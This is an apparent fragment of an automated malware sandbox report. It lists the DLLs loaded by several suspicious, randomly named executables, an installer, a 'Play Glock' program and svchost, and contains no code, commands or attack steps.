Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: dsound.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
